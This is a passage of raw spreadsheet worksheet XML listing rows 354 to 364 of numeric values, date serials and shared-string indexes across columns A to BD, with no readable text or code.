        <v>0</v>
      </c>
      <c r="Z354">
        <v>0</v>
      </c>
      <c r="AA354">
        <v>0</v>
      </c>
      <c r="AB354">
        <v>1000</v>
      </c>
      <c r="AC354">
        <v>500</v>
      </c>
      <c r="AD354">
        <v>0</v>
      </c>
      <c r="AE354">
        <v>1000</v>
      </c>
      <c r="AF354" t="s">
        <v>2954</v>
      </c>
      <c r="AG354">
        <v>15211</v>
      </c>
      <c r="AH354">
        <v>11</v>
      </c>
      <c r="AJ354">
        <v>268</v>
      </c>
      <c r="AK354" t="s">
        <v>252</v>
      </c>
      <c r="AL354" t="s">
        <v>2955</v>
      </c>
      <c r="AM354" t="s">
        <v>2956</v>
      </c>
      <c r="AN354" t="s">
        <v>55</v>
      </c>
      <c r="AO354">
        <v>2016</v>
      </c>
      <c r="AP354">
        <v>81314433488</v>
      </c>
      <c r="AQ354" t="s">
        <v>2957</v>
      </c>
      <c r="AR354" t="s">
        <v>2958</v>
      </c>
      <c r="AS354" t="s">
        <v>71</v>
      </c>
      <c r="AT354" t="s">
        <v>58</v>
      </c>
      <c r="AU354">
        <v>0</v>
      </c>
      <c r="AV354">
        <v>0</v>
      </c>
      <c r="AW354">
        <v>0</v>
      </c>
      <c r="AX354">
        <v>0</v>
      </c>
      <c r="AY354">
        <v>18</v>
      </c>
      <c r="AZ354">
        <v>2</v>
      </c>
      <c r="BA354" t="s">
        <v>16828</v>
      </c>
      <c r="BB354" t="s">
        <v>15150</v>
      </c>
      <c r="BC354">
        <v>0</v>
      </c>
      <c r="BD354" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="355" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A355">
        <v>1574</v>
      </c>
      <c r="B355" t="s">
        <v>2959</v>
      </c>
      <c r="C355" t="s">
        <v>2760</v>
      </c>
      <c r="D355" t="s">
        <v>2960</v>
      </c>
      <c r="E355" t="s">
        <v>826</v>
      </c>
      <c r="F355" t="s">
        <v>2961</v>
      </c>
      <c r="G355" s="1">
        <v>44375</v>
      </c>
      <c r="H355">
        <v>2865</v>
      </c>
      <c r="I355">
        <v>2865</v>
      </c>
      <c r="J355">
        <v>0</v>
      </c>
      <c r="K355">
        <v>0</v>
      </c>
      <c r="L355">
        <v>0</v>
      </c>
      <c r="M355">
        <v>0</v>
      </c>
      <c r="N355">
        <v>0</v>
      </c>
      <c r="O355">
        <v>0</v>
      </c>
      <c r="P355">
        <v>0</v>
      </c>
      <c r="Q355">
        <v>0</v>
      </c>
      <c r="R355">
        <v>0</v>
      </c>
      <c r="S355">
        <v>1</v>
      </c>
      <c r="T355">
        <v>1</v>
      </c>
      <c r="U355">
        <v>0</v>
      </c>
      <c r="V355">
        <v>0</v>
      </c>
      <c r="W355">
        <v>0</v>
      </c>
      <c r="X355">
        <v>0</v>
      </c>
      <c r="Y355">
        <v>0</v>
      </c>
      <c r="Z355">
        <v>0</v>
      </c>
      <c r="AA355">
        <v>0</v>
      </c>
      <c r="AB355">
        <v>0</v>
      </c>
      <c r="AC355">
        <v>0</v>
      </c>
      <c r="AD355">
        <v>1</v>
      </c>
      <c r="AE355">
        <v>50</v>
      </c>
      <c r="AF355" t="s">
        <v>2962</v>
      </c>
      <c r="AG355">
        <v>83127</v>
      </c>
      <c r="AH355">
        <v>18</v>
      </c>
      <c r="AJ355">
        <v>291</v>
      </c>
      <c r="AK355" t="s">
        <v>2963</v>
      </c>
      <c r="AL355" t="s">
        <v>2964</v>
      </c>
      <c r="AM355" t="s">
        <v>2965</v>
      </c>
      <c r="AN355" t="s">
        <v>68</v>
      </c>
      <c r="AO355">
        <v>2014</v>
      </c>
      <c r="AP355">
        <v>8123710043</v>
      </c>
      <c r="AQ355" t="s">
        <v>2966</v>
      </c>
      <c r="AR355" t="s">
        <v>2962</v>
      </c>
      <c r="AS355" t="s">
        <v>71</v>
      </c>
      <c r="AT355" t="s">
        <v>72</v>
      </c>
      <c r="AU355">
        <v>12</v>
      </c>
      <c r="AV355">
        <v>0</v>
      </c>
      <c r="AW355">
        <v>0</v>
      </c>
      <c r="AX355">
        <v>2</v>
      </c>
      <c r="AY355">
        <v>2</v>
      </c>
      <c r="AZ355">
        <v>3</v>
      </c>
      <c r="BA355" t="s">
        <v>17322</v>
      </c>
      <c r="BB355" t="s">
        <v>15377</v>
      </c>
      <c r="BC355" t="s">
        <v>11412</v>
      </c>
      <c r="BD355">
        <v>0</v>
      </c>
    </row>
    <row r="356" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A356">
        <v>1160</v>
      </c>
      <c r="B356" t="s">
        <v>2967</v>
      </c>
      <c r="C356" t="s">
        <v>157</v>
      </c>
      <c r="D356" t="s">
        <v>2968</v>
      </c>
      <c r="E356" t="s">
        <v>2969</v>
      </c>
      <c r="F356" t="s">
        <v>2970</v>
      </c>
      <c r="G356" s="1">
        <v>43909</v>
      </c>
      <c r="H356">
        <v>3035</v>
      </c>
      <c r="I356">
        <v>3035</v>
      </c>
      <c r="J356">
        <v>0</v>
      </c>
      <c r="K356">
        <v>0</v>
      </c>
      <c r="L356">
        <v>0</v>
      </c>
      <c r="M356">
        <v>0</v>
      </c>
      <c r="N356">
        <v>0</v>
      </c>
      <c r="O356">
        <v>0</v>
      </c>
      <c r="P356">
        <v>0</v>
      </c>
      <c r="Q356">
        <v>0</v>
      </c>
      <c r="R356">
        <v>0</v>
      </c>
      <c r="S356">
        <v>0</v>
      </c>
      <c r="T356">
        <v>1</v>
      </c>
      <c r="U356">
        <v>0</v>
      </c>
      <c r="V356">
        <v>0</v>
      </c>
      <c r="W356">
        <v>0</v>
      </c>
      <c r="X356">
        <v>0</v>
      </c>
      <c r="Y356">
        <v>0</v>
      </c>
      <c r="Z356">
        <v>0</v>
      </c>
      <c r="AA356">
        <v>0</v>
      </c>
      <c r="AB356">
        <v>0</v>
      </c>
      <c r="AC356">
        <v>0</v>
      </c>
      <c r="AD356">
        <v>0</v>
      </c>
      <c r="AE356">
        <v>100000</v>
      </c>
      <c r="AF356" t="s">
        <v>2971</v>
      </c>
      <c r="AG356">
        <v>68472</v>
      </c>
      <c r="AH356">
        <v>16</v>
      </c>
      <c r="AJ356">
        <v>237</v>
      </c>
      <c r="AK356" t="s">
        <v>377</v>
      </c>
      <c r="AL356" t="s">
        <v>378</v>
      </c>
      <c r="AM356" t="s">
        <v>2972</v>
      </c>
      <c r="AN356" t="s">
        <v>55</v>
      </c>
      <c r="AO356">
        <v>2001</v>
      </c>
      <c r="AP356" t="s">
        <v>2973</v>
      </c>
      <c r="AQ356" t="s">
        <v>2974</v>
      </c>
      <c r="AR356" t="s">
        <v>2971</v>
      </c>
      <c r="AS356" t="s">
        <v>371</v>
      </c>
      <c r="AT356" t="s">
        <v>58</v>
      </c>
      <c r="AU356">
        <v>25</v>
      </c>
      <c r="AV356">
        <v>1</v>
      </c>
      <c r="AW356">
        <v>55</v>
      </c>
      <c r="AX356">
        <v>77</v>
      </c>
      <c r="AY356">
        <v>15</v>
      </c>
      <c r="AZ356">
        <v>11</v>
      </c>
      <c r="BA356" t="s">
        <v>17251</v>
      </c>
      <c r="BB356" t="s">
        <v>15091</v>
      </c>
      <c r="BC356">
        <v>0</v>
      </c>
      <c r="BD356">
        <v>0</v>
      </c>
    </row>
    <row r="357" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A357">
        <v>1714</v>
      </c>
      <c r="B357" t="s">
        <v>2975</v>
      </c>
      <c r="C357" t="s">
        <v>168</v>
      </c>
      <c r="D357" t="s">
        <v>2976</v>
      </c>
      <c r="E357" t="s">
        <v>2977</v>
      </c>
      <c r="F357" t="s">
        <v>2978</v>
      </c>
      <c r="G357" s="1">
        <v>44186</v>
      </c>
      <c r="H357">
        <v>3084</v>
      </c>
      <c r="I357">
        <v>3084</v>
      </c>
      <c r="J357">
        <v>1</v>
      </c>
      <c r="K357">
        <v>1</v>
      </c>
      <c r="L357">
        <v>1</v>
      </c>
      <c r="M357">
        <v>0</v>
      </c>
      <c r="N357">
        <v>0</v>
      </c>
      <c r="O357">
        <v>0</v>
      </c>
      <c r="P357">
        <v>0</v>
      </c>
      <c r="Q357">
        <v>5</v>
      </c>
      <c r="R357">
        <v>2</v>
      </c>
      <c r="S357">
        <v>0</v>
      </c>
      <c r="T357">
        <v>0</v>
      </c>
      <c r="U357">
        <v>30</v>
      </c>
      <c r="V357">
        <v>10</v>
      </c>
      <c r="W357">
        <v>80</v>
      </c>
      <c r="X357">
        <v>0</v>
      </c>
      <c r="Y357">
        <v>0</v>
      </c>
      <c r="Z357">
        <v>0</v>
      </c>
      <c r="AA357">
        <v>0</v>
      </c>
      <c r="AB357">
        <v>20</v>
      </c>
      <c r="AC357">
        <v>20</v>
      </c>
      <c r="AD357">
        <v>0</v>
      </c>
      <c r="AE357">
        <v>0</v>
      </c>
      <c r="AF357" t="s">
        <v>2979</v>
      </c>
      <c r="AG357">
        <v>16120</v>
      </c>
      <c r="AH357">
        <v>13</v>
      </c>
      <c r="AJ357">
        <v>161</v>
      </c>
      <c r="AK357" t="s">
        <v>2980</v>
      </c>
      <c r="AL357" t="s">
        <v>2980</v>
      </c>
      <c r="AM357" t="s">
        <v>2981</v>
      </c>
      <c r="AN357" t="s">
        <v>68</v>
      </c>
      <c r="AO357">
        <v>2016</v>
      </c>
      <c r="AP357">
        <v>81514199203</v>
      </c>
      <c r="AQ357">
        <v>81514199203</v>
      </c>
      <c r="AR357" t="s">
        <v>2979</v>
      </c>
      <c r="AS357" t="s">
        <v>71</v>
      </c>
      <c r="AT357" t="s">
        <v>72</v>
      </c>
      <c r="AU357">
        <v>0</v>
      </c>
      <c r="AV357">
        <v>0</v>
      </c>
      <c r="AW357">
        <v>14</v>
      </c>
      <c r="AX357">
        <v>1</v>
      </c>
      <c r="AY357">
        <v>7</v>
      </c>
      <c r="AZ357">
        <v>3</v>
      </c>
      <c r="BA357">
        <v>0</v>
      </c>
      <c r="BB357">
        <v>0</v>
      </c>
      <c r="BC357" t="s">
        <v>10812</v>
      </c>
      <c r="BD357">
        <v>0</v>
      </c>
    </row>
    <row r="358" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A358">
        <v>915</v>
      </c>
      <c r="B358" t="s">
        <v>2982</v>
      </c>
      <c r="C358" t="s">
        <v>477</v>
      </c>
      <c r="D358" t="s">
        <v>2983</v>
      </c>
      <c r="E358" t="s">
        <v>111</v>
      </c>
      <c r="F358" t="s">
        <v>2984</v>
      </c>
      <c r="G358" s="1">
        <v>43944</v>
      </c>
      <c r="H358">
        <v>3090</v>
      </c>
      <c r="I358">
        <v>3090</v>
      </c>
      <c r="J358">
        <v>5</v>
      </c>
      <c r="K358">
        <v>0</v>
      </c>
      <c r="L358">
        <v>8</v>
      </c>
      <c r="M358">
        <v>0</v>
      </c>
      <c r="N358">
        <v>0</v>
      </c>
      <c r="O358">
        <v>2</v>
      </c>
      <c r="P358">
        <v>0</v>
      </c>
      <c r="Q358">
        <v>0</v>
      </c>
      <c r="R358">
        <v>0</v>
      </c>
      <c r="S358">
        <v>0</v>
      </c>
      <c r="T358">
        <v>0</v>
      </c>
      <c r="U358">
        <v>2</v>
      </c>
      <c r="V358">
        <v>0</v>
      </c>
      <c r="W358">
        <v>200</v>
      </c>
      <c r="X358">
        <v>0</v>
      </c>
      <c r="Y358">
        <v>0</v>
      </c>
      <c r="Z358">
        <v>2</v>
      </c>
      <c r="AA358">
        <v>0</v>
      </c>
      <c r="AB358">
        <v>0</v>
      </c>
      <c r="AC358">
        <v>0</v>
      </c>
      <c r="AD358">
        <v>0</v>
      </c>
      <c r="AE358">
        <v>0</v>
      </c>
      <c r="AF358" t="s">
        <v>2985</v>
      </c>
      <c r="AG358">
        <v>95526</v>
      </c>
      <c r="AH358">
        <v>29</v>
      </c>
      <c r="AJ358">
        <v>383</v>
      </c>
      <c r="AK358" t="s">
        <v>2986</v>
      </c>
      <c r="AL358" t="s">
        <v>2987</v>
      </c>
      <c r="AM358" t="s">
        <v>2988</v>
      </c>
      <c r="AN358" t="s">
        <v>55</v>
      </c>
      <c r="AO358">
        <v>2011</v>
      </c>
      <c r="AP358" t="s">
        <v>2989</v>
      </c>
      <c r="AQ358" t="s">
        <v>2990</v>
      </c>
      <c r="AR358" t="s">
        <v>2991</v>
      </c>
      <c r="AS358" t="s">
        <v>71</v>
      </c>
      <c r="AT358" t="s">
        <v>58</v>
      </c>
      <c r="AU358">
        <v>24</v>
      </c>
      <c r="AV358">
        <v>0</v>
      </c>
      <c r="AW358">
        <v>40</v>
      </c>
      <c r="AX358">
        <v>0</v>
      </c>
      <c r="AY358">
        <v>8</v>
      </c>
      <c r="AZ358">
        <v>7</v>
      </c>
      <c r="BA358" t="s">
        <v>17320</v>
      </c>
      <c r="BB358" t="s">
        <v>14933</v>
      </c>
      <c r="BC358" t="s">
        <v>9550</v>
      </c>
      <c r="BD358">
        <v>0</v>
      </c>
    </row>
    <row r="359" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A359">
        <v>882</v>
      </c>
      <c r="B359" t="s">
        <v>2992</v>
      </c>
      <c r="C359" t="s">
        <v>47</v>
      </c>
      <c r="D359" t="s">
        <v>2993</v>
      </c>
      <c r="E359" t="s">
        <v>142</v>
      </c>
      <c r="F359" t="s">
        <v>2994</v>
      </c>
      <c r="G359" s="1">
        <v>43991</v>
      </c>
      <c r="H359">
        <v>3117</v>
      </c>
      <c r="I359">
        <v>3117</v>
      </c>
      <c r="J359">
        <v>2</v>
      </c>
      <c r="K359">
        <v>0</v>
      </c>
      <c r="L359">
        <v>0</v>
      </c>
      <c r="M359">
        <v>9</v>
      </c>
      <c r="N359">
        <v>0</v>
      </c>
      <c r="O359">
        <v>0</v>
      </c>
      <c r="P359">
        <v>0</v>
      </c>
      <c r="Q359">
        <v>0</v>
      </c>
      <c r="R359">
        <v>0</v>
      </c>
      <c r="S359">
        <v>0</v>
      </c>
      <c r="T359">
        <v>0</v>
      </c>
      <c r="U359">
        <v>250000</v>
      </c>
      <c r="V359">
        <v>0</v>
      </c>
      <c r="W359">
        <v>0</v>
      </c>
      <c r="X359">
        <v>440</v>
      </c>
      <c r="Y359">
        <v>0</v>
      </c>
      <c r="Z359">
        <v>0</v>
      </c>
      <c r="AA359">
        <v>0</v>
      </c>
      <c r="AB359">
        <v>0</v>
      </c>
      <c r="AC359">
        <v>0</v>
      </c>
      <c r="AD359">
        <v>0</v>
      </c>
      <c r="AE359">
        <v>0</v>
      </c>
      <c r="AF359" t="s">
        <v>2995</v>
      </c>
      <c r="AG359">
        <v>20400</v>
      </c>
      <c r="AH359">
        <v>2</v>
      </c>
      <c r="AJ359">
        <v>53</v>
      </c>
      <c r="AK359" t="s">
        <v>2220</v>
      </c>
      <c r="AL359" t="s">
        <v>2221</v>
      </c>
      <c r="AM359" t="s">
        <v>2996</v>
      </c>
      <c r="AN359" t="s">
        <v>82</v>
      </c>
      <c r="AO359">
        <v>2009</v>
      </c>
      <c r="AP359" t="s">
        <v>2997</v>
      </c>
      <c r="AQ359" t="s">
        <v>2998</v>
      </c>
      <c r="AR359" t="s">
        <v>2999</v>
      </c>
      <c r="AS359" t="s">
        <v>71</v>
      </c>
      <c r="AT359" t="s">
        <v>86</v>
      </c>
      <c r="AU359">
        <v>25</v>
      </c>
      <c r="AV359">
        <v>1</v>
      </c>
      <c r="AW359">
        <v>26</v>
      </c>
      <c r="AX359">
        <v>81</v>
      </c>
      <c r="AY359">
        <v>25</v>
      </c>
      <c r="AZ359">
        <v>23</v>
      </c>
      <c r="BA359" t="s">
        <v>17333</v>
      </c>
      <c r="BB359" t="s">
        <v>14913</v>
      </c>
      <c r="BC359">
        <v>0</v>
      </c>
      <c r="BD359" t="s">
        <v>10835</v>
      </c>
    </row>
    <row r="360" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A360">
        <v>888</v>
      </c>
      <c r="B360" t="s">
        <v>3000</v>
      </c>
      <c r="C360" t="s">
        <v>99</v>
      </c>
      <c r="D360" t="s">
        <v>3001</v>
      </c>
      <c r="E360" t="s">
        <v>142</v>
      </c>
      <c r="F360" t="s">
        <v>3002</v>
      </c>
      <c r="G360" s="1">
        <v>43984</v>
      </c>
      <c r="H360">
        <v>3204</v>
      </c>
      <c r="I360">
        <v>3204</v>
      </c>
      <c r="J360">
        <v>5</v>
      </c>
      <c r="K360">
        <v>0</v>
      </c>
      <c r="L360">
        <v>1</v>
      </c>
      <c r="M360">
        <v>0</v>
      </c>
      <c r="N360">
        <v>0</v>
      </c>
      <c r="O360">
        <v>0</v>
      </c>
      <c r="P360">
        <v>0</v>
      </c>
      <c r="Q360">
        <v>0</v>
      </c>
      <c r="R360">
        <v>0</v>
      </c>
      <c r="S360">
        <v>0</v>
      </c>
      <c r="T360">
        <v>0</v>
      </c>
      <c r="U360">
        <v>800000</v>
      </c>
      <c r="V360">
        <v>0</v>
      </c>
      <c r="W360">
        <v>5000</v>
      </c>
      <c r="X360">
        <v>0</v>
      </c>
      <c r="Y360">
        <v>0</v>
      </c>
      <c r="Z360">
        <v>0</v>
      </c>
      <c r="AA360">
        <v>0</v>
      </c>
      <c r="AB360">
        <v>0</v>
      </c>
      <c r="AC360">
        <v>0</v>
      </c>
      <c r="AD360">
        <v>0</v>
      </c>
      <c r="AE360">
        <v>0</v>
      </c>
      <c r="AF360" t="s">
        <v>3003</v>
      </c>
      <c r="AG360">
        <v>14440</v>
      </c>
      <c r="AH360">
        <v>12</v>
      </c>
      <c r="AJ360">
        <v>160</v>
      </c>
      <c r="AK360" t="s">
        <v>114</v>
      </c>
      <c r="AL360" t="s">
        <v>114</v>
      </c>
      <c r="AM360" t="s">
        <v>3004</v>
      </c>
      <c r="AN360" t="s">
        <v>55</v>
      </c>
      <c r="AO360">
        <v>2005</v>
      </c>
      <c r="AP360">
        <v>66696791</v>
      </c>
      <c r="AQ360" t="s">
        <v>3005</v>
      </c>
      <c r="AR360" t="s">
        <v>3003</v>
      </c>
      <c r="AS360" t="s">
        <v>371</v>
      </c>
      <c r="AT360" t="s">
        <v>72</v>
      </c>
      <c r="AU360">
        <v>25</v>
      </c>
      <c r="AV360">
        <v>1</v>
      </c>
      <c r="AW360">
        <v>33</v>
      </c>
      <c r="AX360">
        <v>0</v>
      </c>
      <c r="AY360">
        <v>3</v>
      </c>
      <c r="AZ360">
        <v>9</v>
      </c>
      <c r="BA360" t="s">
        <v>16771</v>
      </c>
      <c r="BB360" t="s">
        <v>14918</v>
      </c>
      <c r="BC360" t="s">
        <v>10029</v>
      </c>
      <c r="BD360" t="s">
        <v>10949</v>
      </c>
    </row>
    <row r="361" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A361">
        <v>992</v>
      </c>
      <c r="B361" t="s">
        <v>3006</v>
      </c>
      <c r="C361" t="s">
        <v>477</v>
      </c>
      <c r="D361" t="s">
        <v>3007</v>
      </c>
      <c r="E361" t="s">
        <v>142</v>
      </c>
      <c r="F361" t="s">
        <v>666</v>
      </c>
      <c r="G361" s="1">
        <v>43948</v>
      </c>
      <c r="H361">
        <v>3249</v>
      </c>
      <c r="I361">
        <v>3249</v>
      </c>
      <c r="J361">
        <v>0</v>
      </c>
      <c r="K361">
        <v>2</v>
      </c>
      <c r="L361">
        <v>8</v>
      </c>
      <c r="M361">
        <v>0</v>
      </c>
      <c r="N361">
        <v>0</v>
      </c>
      <c r="O361">
        <v>0</v>
      </c>
      <c r="P361">
        <v>0</v>
      </c>
      <c r="Q361">
        <v>2</v>
      </c>
      <c r="R361">
        <v>0</v>
      </c>
      <c r="S361">
        <v>0</v>
      </c>
      <c r="T361">
        <v>0</v>
      </c>
      <c r="U361">
        <v>0</v>
      </c>
      <c r="V361">
        <v>100000</v>
      </c>
      <c r="W361">
        <v>20000</v>
      </c>
      <c r="X361">
        <v>0</v>
      </c>
      <c r="Y361">
        <v>0</v>
      </c>
      <c r="Z361">
        <v>0</v>
      </c>
      <c r="AA361">
        <v>0</v>
      </c>
      <c r="AB361">
        <v>100</v>
      </c>
      <c r="AC361">
        <v>0</v>
      </c>
      <c r="AD361">
        <v>0</v>
      </c>
      <c r="AE361">
        <v>0</v>
      </c>
      <c r="AF361" t="s">
        <v>3008</v>
      </c>
      <c r="AG361">
        <v>95542</v>
      </c>
      <c r="AH361">
        <v>29</v>
      </c>
      <c r="AJ361">
        <v>383</v>
      </c>
      <c r="AK361" t="s">
        <v>1963</v>
      </c>
      <c r="AL361" t="s">
        <v>1964</v>
      </c>
      <c r="AM361" t="s">
        <v>3009</v>
      </c>
      <c r="AN361" t="s">
        <v>55</v>
      </c>
      <c r="AO361">
        <v>2016</v>
      </c>
      <c r="AP361" t="s">
        <v>3010</v>
      </c>
      <c r="AQ361" t="s">
        <v>3011</v>
      </c>
      <c r="AR361" t="s">
        <v>3008</v>
      </c>
      <c r="AS361" t="s">
        <v>71</v>
      </c>
      <c r="AT361" t="s">
        <v>58</v>
      </c>
      <c r="AU361">
        <v>30</v>
      </c>
      <c r="AV361">
        <v>0</v>
      </c>
      <c r="AW361">
        <v>23</v>
      </c>
      <c r="AX361">
        <v>12</v>
      </c>
      <c r="AY361">
        <v>8</v>
      </c>
      <c r="AZ361">
        <v>4</v>
      </c>
      <c r="BA361">
        <v>0</v>
      </c>
      <c r="BB361">
        <v>0</v>
      </c>
      <c r="BC361" t="s">
        <v>9550</v>
      </c>
      <c r="BD361">
        <v>0</v>
      </c>
    </row>
    <row r="362" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A362">
        <v>1000</v>
      </c>
      <c r="B362" t="s">
        <v>3012</v>
      </c>
      <c r="C362" t="s">
        <v>3013</v>
      </c>
      <c r="D362" t="s">
        <v>3014</v>
      </c>
      <c r="E362" t="s">
        <v>3015</v>
      </c>
      <c r="F362" t="s">
        <v>3016</v>
      </c>
      <c r="G362" s="1">
        <v>44055</v>
      </c>
      <c r="H362">
        <v>3261</v>
      </c>
      <c r="I362">
        <v>3261</v>
      </c>
      <c r="J362">
        <v>0</v>
      </c>
      <c r="K362">
        <v>0</v>
      </c>
      <c r="L362">
        <v>0</v>
      </c>
      <c r="M362">
        <v>0</v>
      </c>
      <c r="N362">
        <v>0</v>
      </c>
      <c r="O362">
        <v>0</v>
      </c>
      <c r="P362">
        <v>0</v>
      </c>
      <c r="Q362">
        <v>1</v>
      </c>
      <c r="R362">
        <v>1</v>
      </c>
      <c r="S362">
        <v>1</v>
      </c>
      <c r="T362">
        <v>1</v>
      </c>
      <c r="U362">
        <v>0</v>
      </c>
      <c r="V362">
        <v>0</v>
      </c>
      <c r="W362">
        <v>0</v>
      </c>
      <c r="X362">
        <v>0</v>
      </c>
      <c r="Y362">
        <v>0</v>
      </c>
      <c r="Z362">
        <v>0</v>
      </c>
      <c r="AA362">
        <v>0</v>
      </c>
      <c r="AB362">
        <v>200</v>
      </c>
      <c r="AC362">
        <v>500</v>
      </c>
      <c r="AD362">
        <v>1</v>
      </c>
      <c r="AE362">
        <v>1000</v>
      </c>
      <c r="AF362" t="s">
        <v>3017</v>
      </c>
      <c r="AG362">
        <v>28993</v>
      </c>
      <c r="AH362">
        <v>4</v>
      </c>
      <c r="AJ362">
        <v>84</v>
      </c>
      <c r="AK362" t="s">
        <v>3018</v>
      </c>
      <c r="AL362" t="s">
        <v>3019</v>
      </c>
      <c r="AM362" t="s">
        <v>3020</v>
      </c>
      <c r="AN362" t="s">
        <v>68</v>
      </c>
      <c r="AO362">
        <v>2001</v>
      </c>
      <c r="AP362">
        <v>85356513647</v>
      </c>
      <c r="AQ362" t="s">
        <v>3021</v>
      </c>
      <c r="AR362" t="s">
        <v>3017</v>
      </c>
      <c r="AS362" t="s">
        <v>71</v>
      </c>
      <c r="AT362" t="s">
        <v>72</v>
      </c>
      <c r="AU362">
        <v>1</v>
      </c>
      <c r="AV362">
        <v>1</v>
      </c>
      <c r="AW362">
        <v>4</v>
      </c>
      <c r="AX362">
        <v>1</v>
      </c>
      <c r="AY362">
        <v>4</v>
      </c>
      <c r="AZ362">
        <v>1</v>
      </c>
      <c r="BA362" t="s">
        <v>17299</v>
      </c>
      <c r="BB362" t="s">
        <v>14988</v>
      </c>
      <c r="BC362">
        <v>0</v>
      </c>
      <c r="BD362" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="363" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A363">
        <v>1308</v>
      </c>
      <c r="B363" t="s">
        <v>3022</v>
      </c>
      <c r="C363" t="s">
        <v>129</v>
      </c>
      <c r="D363" t="s">
        <v>3023</v>
      </c>
      <c r="E363" t="s">
        <v>984</v>
      </c>
      <c r="F363" t="s">
        <v>3024</v>
      </c>
      <c r="G363" s="1">
        <v>44211</v>
      </c>
      <c r="H363">
        <v>3376</v>
      </c>
      <c r="I363">
        <v>3376</v>
      </c>
      <c r="J363">
        <v>1</v>
      </c>
      <c r="K363">
        <v>1</v>
      </c>
      <c r="L363">
        <v>0</v>
      </c>
      <c r="M363">
        <v>0</v>
      </c>
      <c r="N363">
        <v>0</v>
      </c>
      <c r="O363">
        <v>0</v>
      </c>
      <c r="P363">
        <v>0</v>
      </c>
      <c r="Q363">
        <v>2</v>
      </c>
      <c r="R363">
        <v>8</v>
      </c>
      <c r="S363">
        <v>0</v>
      </c>
      <c r="T363">
        <v>1</v>
      </c>
      <c r="U363">
        <v>6000</v>
      </c>
      <c r="V363">
        <v>6000</v>
      </c>
      <c r="W363">
        <v>0</v>
      </c>
      <c r="X363">
        <v>0</v>
      </c>
      <c r="Y363">
        <v>0</v>
      </c>
      <c r="Z363">
        <v>0</v>
      </c>
      <c r="AA363">
        <v>0</v>
      </c>
      <c r="AB363">
        <v>1000</v>
      </c>
      <c r="AC363">
        <v>6000</v>
      </c>
      <c r="AD363">
        <v>0</v>
      </c>
      <c r="AE363">
        <v>3000</v>
      </c>
      <c r="AF363" t="s">
        <v>3025</v>
      </c>
      <c r="AG363">
        <v>15129</v>
      </c>
      <c r="AH363">
        <v>11</v>
      </c>
      <c r="AJ363">
        <v>270</v>
      </c>
      <c r="AK363" t="s">
        <v>620</v>
      </c>
      <c r="AL363" t="s">
        <v>630</v>
      </c>
      <c r="AM363" t="s">
        <v>3026</v>
      </c>
      <c r="AN363" t="s">
        <v>55</v>
      </c>
      <c r="AO363">
        <v>2015</v>
      </c>
      <c r="AP363" t="s">
        <v>3027</v>
      </c>
      <c r="AQ363" t="s">
        <v>3028</v>
      </c>
      <c r="AR363" t="s">
        <v>3029</v>
      </c>
      <c r="AS363" t="s">
        <v>71</v>
      </c>
      <c r="AT363" t="s">
        <v>58</v>
      </c>
      <c r="AU363">
        <v>26</v>
      </c>
      <c r="AV363">
        <v>0</v>
      </c>
      <c r="AW363">
        <v>0</v>
      </c>
      <c r="AX363">
        <v>0</v>
      </c>
      <c r="AY363">
        <v>13</v>
      </c>
      <c r="AZ363">
        <v>0</v>
      </c>
      <c r="BA363" t="s">
        <v>16843</v>
      </c>
      <c r="BB363" t="s">
        <v>15189</v>
      </c>
      <c r="BC363">
        <v>0</v>
      </c>
      <c r="BD363">
        <v>0</v>
      </c>
    </row>
    <row r="364" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A364">
        <v>840</v>
      </c>
      <c r="B364" t="s">
        <v>3030</v>
      </c>
      <c r="C364" t="s">
        <v>157</v>
      </c>
      <c r="D364" t="s">
        <v>3031</v>
      </c>
      <c r="E364" t="s">
        <v>121</v>
      </c>
      <c r="F364" t="s">
        <v>3032</v>
      </c>
      <c r="G364" s="1">
        <v>44084</v>
      </c>
      <c r="H364">
        <v>3432</v>
      </c>
      <c r="I364">
        <v>3432</v>
      </c>
      <c r="J364">
        <v>3</v>
      </c>
      <c r="K364">
        <v>0</v>
      </c>
      <c r="L364">
        <v>0</v>
      </c>
      <c r="M364">
        <v>0</v>
      </c>
      <c r="N364">
        <v>0</v>
      </c>
      <c r="O364">
        <v>0</v>
      </c>
      <c r="P364">
        <v>0</v>
      </c>
      <c r="Q364">
        <v>0</v>
      </c>
      <c r="R364">
        <v>0</v>
      </c>
      <c r="S364">
        <v>0</v>
      </c>
      <c r="T364">
        <v>1</v>
      </c>
      <c r="U364">
        <v>600</v>
      </c>
      <c r="V364">
        <v>0</v>
      </c>
      <c r="W364">
        <v>0</v>
      </c>
      <c r="X364">
        <v>0</v>
      </c>
      <c r="Y364">
        <v>0</v>
      </c>
      <c r="Z364">
        <v>0</v>
      </c>
      <c r="AA364">
        <v>0</v>
      </c>
      <c r="AB364">
        <v>0</v>
      </c>
      <c r="AC364">
        <v>0</v>
      </c>
      <c r="AD364">
        <v>0</v>
      </c>
      <c r="AE364">
        <v>100</v>
      </c>
      <c r="AF364" t="s">
        <v>3033</v>
      </c>
      <c r="AG364">
        <v>62253</v>
      </c>
      <c r="AH364">
        <v>16</v>
      </c>
      <c r="AJ364">
        <v>251</v>
      </c>
      <c r="AK364" t="s">
        <v>3034</v>
      </c>
      <c r="AL364" t="s">
        <v>3034</v>
      </c>
      <c r="AM364" t="s">
        <v>3035</v>
      </c>
      <c r="AN364" t="s">
        <v>68</v>
      </c>
      <c r="AO364">
        <v>2014</v>
      </c>
      <c r="AP364">
        <v>81231270541</v>
      </c>
      <c r="AQ364">
        <v>81231270541</v>
      </c>
      <c r="AR364" t="s">
        <v>3033</v>
      </c>
      <c r="AS364" t="s">
        <v>71</v>
      </c>
      <c r="AT364" t="s">
        <v>72</v>
      </c>
      <c r="AU364">
        <v>25</v>
      </c>
      <c r="AV364">
        <v>1</v>
      </c>
      <c r="AW364">
        <v>0</v>
      </c>
      <c r="AX364">
        <v>4</v>
      </c>
      <c r="AY364">
        <v>0</v>
      </c>
      <c r="AZ364">
        <v>1</v>
      </c>
      <c r="BA364">
        <v>0</v>
      </c>
      <c r="BB364" t="s">
